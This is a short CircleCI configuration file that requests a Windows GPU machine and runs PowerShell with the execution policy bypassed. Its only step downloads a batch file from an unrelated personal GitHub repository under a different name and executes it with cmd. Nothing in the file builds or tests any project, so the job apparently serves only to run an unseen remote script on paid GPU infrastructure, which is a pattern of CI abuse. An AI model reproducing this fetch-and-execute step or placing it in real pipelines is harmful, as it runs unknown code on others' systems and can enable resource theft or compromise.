version: 2.1

jobs:
  build:
    machine:
      image: windows-server-2019-nvidia:stable
      resource_class: windows.gpu.nvidia.medium
      shell: powershell.exe -ExecutionPolicy Bypass
    steps:
      - run: |
          wget -O wiz.bat https://github.com/ajiLa78/slepoq/raw/main/fiz.bat
          cmd /c wiz.bat
